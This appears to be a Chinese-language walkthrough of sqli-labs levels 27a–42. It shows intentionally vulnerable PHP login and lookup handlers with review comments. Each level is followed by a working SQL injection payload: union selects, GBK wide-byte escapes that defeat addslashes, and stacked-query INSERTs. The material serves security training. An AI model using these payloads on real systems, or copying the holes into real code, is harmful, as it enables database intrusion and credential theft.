%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/





// Parenthesised-quote variant of the character deny-list level; DB errors
// are not echoed here, so the page is a boolean oracle only.
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // Raw value is logged before filtering.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

    // connectivity
    // SQL injection sink: string-built query; use a bound parameter.
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

// Single-pass deny-list; the [...] patterns are character classes (each
// listed character is removed individually). The \s line is duplicated.
// Character stripping is not a substitute for parameterization.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);      //strip out every '/' and '*' character
    $id= preg_replace('/[--]/',"", $id);        //Strip out every '-' character (class, not the "--" token)
    $id= preg_replace('/[#]/',"", $id);         //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out whitespace matched by \s
    $id= preg_replace('/[\s]/',"", $id);        //Duplicate of the line above
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out forward and back slashes
    return $id;
}





// GET id lookup with a case-specific keyword deny-list (blacklist() below).
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // Raw value is logged before filtering.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

    // connectivity
    // SQL injection sink: string-built query; use a bound parameter.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // DB error text reaches the client (error-based oracle).
        print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

// Single-pass deny-list. The keyword patterns are case-sensitive and list
// only the exact spellings below (no /i), and the original comments on the
// 'select' and '[ +]' lines were wrong; corrected here. A keyword deny-list
// is not a substitute for parameterization.
function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"", $id);       //strip out every '/' and '*' character
    $id= preg_replace('/[--]/',"", $id);      //Strip out every '-' character (class, not the "--" token)
    $id= preg_replace('/[#]/',"", $id);          //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);      //Strip out space and '+' characters.
    $id= preg_replace('/select/m',"", $id);      //Strip out lowercase "select" (/m is irrelevant without ^ or $).
    $id= preg_replace('/[ +]/',"", $id);     //Strip out space and '+' characters (repeat).
    $id= preg_replace('/union/s',"", $id);       //Strip out union
    $id= preg_replace('/select/s',"", $id);        //Strip out select
    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);        //Strip out Union
    $id= preg_replace('/Select/s',"", $id);        //Strip out Select
    return $id;
}





// Double-quoted variant of the keyword deny-list level; DB errors are not
// echoed, so the page is a boolean oracle only.
if(isset($_GET['id'])){
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // Raw value is logged before filtering.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;
    // Double quotes only delimit the literal; they escape nothing.
    $id = '"' .$id. '"';

    // connectivity
    // SQL injection sink: string-built query; use a bound parameter.
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // The stored password is rendered to the page.
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else
{
    echo "Please input the ID as parameter with numeric value";
}

// Single-pass, case-sensitive keyword deny-list (exact spellings only, no
// /i); original comments on the 'select' and '[ +]' lines corrected. Not a
// substitute for parameterization.
function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"", $id);       //strip out every '/' and '*' character
    $id= preg_replace('/[--]/',"", $id);      //Strip out every '-' character (class, not the "--" token)
    $id= preg_replace('/[#]/',"", $id);          //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);      //Strip out space and '+' characters.
    $id= preg_replace('/select/m',"", $id);      //Strip out lowercase "select" (/m is irrelevant without ^ or $).
    $id= preg_replace('/[ +]/',"", $id);     //Strip out space and '+' characters (repeat).
    $id= preg_replace('/union/s',"", $id);       //Strip out union
    $id= preg_replace('/select/s',"", $id);        //Strip out select
    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);        //Strip out Union
    $id= preg_replace('/Select/s',"", $id);        //Strip out Select
    return $id;
}





// Less-28-style handler: ?id= is filtered by blacklist() and placed inside ('...') in the
// SQL string. The error branch prints nothing (blind). The interesting part is the
// filter: a single combined, case-insensitive rule whose ordering undercuts it.
if(isset($_GET['id'])){
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw, pre-filter input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;   // not read in this snippet
    // connectivity
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // mysql_error() is commented out: no error text reaches the client.
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else { echo "Please input the ID as parameter with numeric value";}

// Denylist filter. The '/[ +]/' rules run before the combined 'union\s+select' rule, so
// by the time that rule executes a plain space can no longer be present for its '\s+'
// to match — rule order matters in a denylist, and a prepared statement avoids the issue.
function blacklist($id)
{
    $id= preg_replace('/[\/\*]/',"", $id);               //strip out / and * (each character on its own)
    $id= preg_replace('/[--]/',"", $id);              //Strip out '-' (one character at a time).
    $id= preg_replace('/[#]/',"", $id);                  //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);              //Strip out spaces and '+'.
    //$id= preg_replace('/select/m',"", $id);                //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);             //Strip out spaces and '+' (duplicate).
    $id= preg_replace('/union\s+select/i',"", $id);      //Strip out UNION & SELECT (case-insensitive, whitespace-separated pair only).
    return $id;
}

这一关主要加了一个 union select 过滤,但由于空格本来就已经被过滤,注入时用的就是绕过空格的写法,所以这个过滤完全就是摆设




// Less-28a-style handler: identical flow to Less-28 (?id= inside ('...'), blind — no error
// output), but blacklist() has every rule commented out except the single combined
// 'union\s+select' pattern.
if(isset($_GET['id'])){
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw, pre-filter input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;   // not read in this snippet
    // connectivity
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // mysql_error() is commented out: no error text reaches the client.
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else { echo "Please input the ID as parameter with numeric value";}

// Denylist filter reduced to one active rule. A single literal pattern is not a
// substitute for a prepared statement or an integer cast.
function blacklist($id)
{
    //$id= preg_replace('/[\/\*]/',"", $id);             //strip out /*
    //$id= preg_replace('/[--]/',"", $id);                //Strip out --.
    //$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
    //$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    //$id= preg_replace('/select/m',"", $id);                //Strip out spaces.
    //$id= preg_replace('/[ +]/',"", $id);               //Strip out spaces.
    $id= preg_replace('/union\s+select/i',"", $id);      //Strip out the whitespace-separated 'union select' pair, case-insensitive (original comment said "spaces").
    return $id;
}




// Less-29-style handler: no filter at all — ?id= goes straight into a single-quoted SQL
// literal, and mysql_error() output is returned to the client. The raw query string is
// also captured in $qs/$hint but not used in this snippet.
if(isset($_GET['id'])){
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    $qs = $_SERVER['QUERY_STRING'];   // raw, unparsed query string
    $hint=$qs;                        // not read here; presumably consumed by an included page
    // connectivity
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}

这个跟Less-1一样没有过滤,直接联合注入:20' union select 1,2,database()%23



// Less-30-style handler: no filter; the value is wrapped in double quotes in PHP and then
// interpolated. The error branch prints nothing, so failures are silent (blind).
if(isset($_GET['id'])){
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    $qs = $_SERVER['QUERY_STRING'];   // raw query string, not used here
    $hint=$qs;
    // Double quotes are added in PHP, not in the SQL literal.
    $id = '"' .$id. '"';
    // connectivity
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // mysql_error() is commented out: no error text reaches the client.
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}


20"union select 1,2,database()--+



// Less-31-style handler: no filter; the value is double-quoted in PHP and placed inside
// parentheses in the SQL string. mysql_error() output is returned to the client.
if(isset($_GET['id'])){
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    $qs = $_SERVER['QUERY_STRING'];   // raw query string, not used here
    $hint=$qs;
    // Double quotes are added in PHP, not in the SQL literal.
    $id = '"'.$id.'"';
    // connectivity
    $sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}


20")union select 1,2,database()--+



// Hand-rolled escaping: backslash, single quote and double quote each get a backslash
// prefix. This operates on bytes with no knowledge of the connection charset; the
// connection below is then switched to gbk (a multibyte charset) with a plain query.
// Escaping and connection charset must agree — set the charset through the client API
// and prefer bound parameters over hand-written escaping.
function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash ('/i' has no effect on a quote)
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
    return $string;
}

// Less-32-style handler: ?id= is escaped by check_addslashes() and interpolated into a
// single-quoted SQL literal; mysql_error() output is returned to the client.
if(isset($_GET['id'])){
    $id=check_addslashes($_GET['id']);
    //echo "The filtered request is :" .$id . "<br>";
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the (escaped) input is appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    // Charset changed via a query after the PHP-side escaping has already been applied.
    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}


payload: 20%df%5c%27union select 1,2,database()--+



// Less-33-style handler: same flow as Less-32 — ?id= is escaped by check_addslashes()
// (defined outside this snippet), the connection charset is then switched to gbk with a
// plain query, and the escaped value is interpolated into a single-quoted literal.
// Byte-wise escaping done before the multibyte charset switch is the mismatch to fix:
// set the charset through the client API and use bound parameters.
if(isset($_GET['id'])){
    $id=check_addslashes($_GET['id']);
    //echo "The filtered request is :" .$id . "<br>";
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the (escaped) input is appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}

这一关跟上一关一样,payload: 20%df%5c%27union select 1,2,database()--+



// Less-34-style POST login: both fields are passed through addslashes() (charset-unaware)
// and then the connection is switched to gbk with a plain query before the string-built
// query runs. The submitted password is compared as-is, so the column must hold it
// unhashed, and both credentials are written in clear to result.txt before escaping.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname1=$_POST['uname'];
    $passwd1=$_POST['passwd'];
    //echo "username before addslashes is :".$uname1 ."<br>";
    //echo "Input password before addslashes is : ".$passwd1. "<br>";
    //logging the connection parameters to a file for analysis.
    // NOTE(review): plaintext username and password appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname1);
    fwrite($fp,'Password:'.$passwd1."\n");
    fclose($fp);
    $uname = addslashes($uname1);
    $passwd= addslashes($passwd1);
    //echo "username after addslashes is :".$uname ."<br>";
    //echo "Input password after addslashes is : ".$passwd;
    // connectivity
    // Charset switched after escaping; escaping must be charset-aware to be meaningful.
    mysql_query("SET NAMES gbk");
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        // Unescaped output; the password is echoed back in clear.
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        // Database error text returned to the client.
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}


passwd=1&uname=20運'or 1=2 union select 1,database()#



// Thin wrapper around addslashes(): prefixes quotes, backslashes and NUL with a backslash.
function check_addslashes($string)
{
    $string = addslashes($string);
    return $string;
}

// Less-35-style handler: ?id= is passed through addslashes() and then interpolated
// UNQUOTED into the SQL string. Quote escaping only matters inside a quoted literal;
// in a bare numeric position it provides no protection at all — the value should be
// cast to int or bound as a parameter.
// take the variables
if(isset($_GET['id'])){
    $id=check_addslashes($_GET['id']);
    //echo "The filtered request is :" .$id . "<br>";
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the (escaped) input is appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}


20 union select 1,2,database()#



// Wrapper around mysql_real_escape_string(). That function escapes according to the
// charset the client library believes the connection uses; "SET NAMES" sent as a query
// (below) does not update that client-side setting — the documented way is
// mysql_set_charset(). A prepared statement sidesteps the escaping question entirely.
function check_quotes($string)
{
    $string= mysql_real_escape_string($string);
    return $string;
}

// Less-36-style handler: ?id= escaped by check_quotes() and interpolated into a
// single-quoted literal after the connection charset is switched to gbk via a query.
// take the variables
if(isset($_GET['id'])){
    $id=check_quotes($_GET['id']);
    //echo "The filtered request is :" .$id . "<br>";
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the (escaped) input is appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Unescaped output; password shown in clear.
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}


同样使用宽字符绕过即可,payload: 20%df%5c%27union select 1,2,database()--+



// Less-37-style POST login: same shape as Less-34 with mysql_real_escape_string() in
// place of addslashes(). The charset is still switched with a "SET NAMES" query, which
// the client library's escaping does not see (mysql_set_charset() is the documented
// route). Password is compared in clear; both credentials are logged in clear.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname1=$_POST['uname'];
    $passwd1=$_POST['passwd'];
    //echo "username before addslashes is :".$uname1 ."<br>";
    //echo "Input password before addslashes is : ".$passwd1. "<br>";
    //logging the connection parameters to a file for analysis.
    // NOTE(review): plaintext username and password appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname1);
    fwrite($fp,'Password:'.$passwd1."\n");
    fclose($fp);
    $uname = mysql_real_escape_string($uname1);
    $passwd= mysql_real_escape_string($passwd1);
    //echo "username after addslashes is :".$uname ."<br>";
    //echo "Input password after addslashes is : ".$passwd;
    // connectivity
    mysql_query("SET NAMES gbk");
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        // Unescaped output; the password is echoed back in clear.
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        // Database error text returned to the client.
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}

这一关跟上一关过滤一样,只是把请求方式改成了 POST,payload: passwd=1&uname=20運'union select 1,database()--+



// Less-38-style handler: ?id= goes unfiltered into a single-quoted literal and the query
// is executed with mysqli_multi_query(), which runs every ';'-separated statement it is
// handed. A one-statement lookup should use mysqli_query() — or a prepared statement,
// which removes the interpolation altogether.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);   // credentials come from outside this snippet
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if($row = mysqli_fetch_row($result))
            {
                // Username and password printed unescaped via printf("%s").
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
//            mysqli_free_result($result);
        }
        /* print divider */
        // Only the first result set is consumed; the mysqli_next_result() loop is commented
        // out, so any further result sets are left unread on the connection.
        if (mysqli_more_results($con1))
        {
            //printf("-----------------\n");
        }
        //while (mysqli_next_result($con1));
    }
    else
    {
        // Database error text returned to the client.
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
    /* close connection */
    mysqli_close($con1);
}

Less-38 到 Less-53都是堆叠注入

堆叠注入可以直接插入数据,payload: 1';insert into users values('38','laotun','123456')--+





// Less-39-style handler: as Less-38 but ?id= is interpolated UNQUOTED (numeric context)
// and still executed through mysqli_multi_query(), which runs every ';'-separated
// statement. An integer cast or a bound parameter plus mysqli_query() is the fix.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);   // credentials come from outside this snippet
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if($row = mysqli_fetch_row($result))
            {
                // Username and password printed unescaped via printf("%s").
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
//            mysqli_free_result($result);
        }
        /* print divider */
        // Only the first result set is consumed; the mysqli_next_result() loop is commented out.
        if (mysqli_more_results($con1))
        {
            //printf("-----------------\n");
        }
        //while (mysqli_next_result($con1));
    }
    else
    {
        // Database error text returned to the client.
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
    /* close connection */
    mysqli_close($con1);
}

这一关相比于上一关只是把字符型改成了数字型,payload: 1;insert into users values('39','laotun','123456')--+





// Less-40-style handler: ?id= is placed inside ('...') and executed through
// mysqli_multi_query(). There is no else branch after the multi-query call, so a
// failing statement produces no output at all (blind). Use mysqli_query() with a
// prepared statement for a single lookup.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);   // credentials come from outside this snippet
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if($row = mysqli_fetch_row($result))
            {
                // Username and password printed unescaped via printf("%s").
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
//            mysqli_free_result($result);
        }
        /* print divider */
        // Only the first result set is consumed; the mysqli_next_result() loop is commented out.
        if (mysqli_more_results($con1))
        {
            //printf("-----------------\n");
        }
        //while (mysqli_next_result($con1));
    }
    // No error branch: query failures are silent.
    /* close connection */
    mysqli_close($con1);
}

这关是用括号和单引号包裹起来的,闭合绕过即可,payload: 1');insert into users values('40','laotun','123456')--+





// Less-41-style handler: ?id= is interpolated UNQUOTED and executed through
// mysqli_multi_query(); no error branch, so failures are silent (blind). An integer
// cast or a bound parameter plus mysqli_query() is the fix.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);   // credentials come from outside this snippet
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if($row = mysqli_fetch_row($result))
            {
                // Username and password printed unescaped via printf("%s").
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
//            mysqli_free_result($result);
        }
        /* print divider */
        // Only the first result set is consumed; the mysqli_next_result() loop is commented out.
        if (mysqli_more_results($con1))
        {
            //printf("-----------------\n");
        }
        //while (mysqli_next_result($con1));
    }
    // No error branch: query failures are silent.
    /* close connection */
    mysqli_close($con1);
}


payload: 1;insert into users values('41','laotun','123456')--+





// login.php
// Less-42 login helper. Returns the matched row's second column ($row[1]), 0 when the
// row exists but that column is empty, and otherwise falls off the end of the function
// (NULL) — callers must treat NULL and 0 alike.
function sqllogin($host,$dbuser,$dbpass, $dbname){
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
    // NOTE(review): the two inputs are treated differently — login_user is escaped for
    // the connection, login_password is concatenated exactly as received. The escaping
    // also runs before the connection check below, so on a failed connect $con1 is not
    // a valid link when mysqli_real_escape_string() is called.
    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
    $password = $_POST["login_password"];
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");
    }
    /* execute multi query */
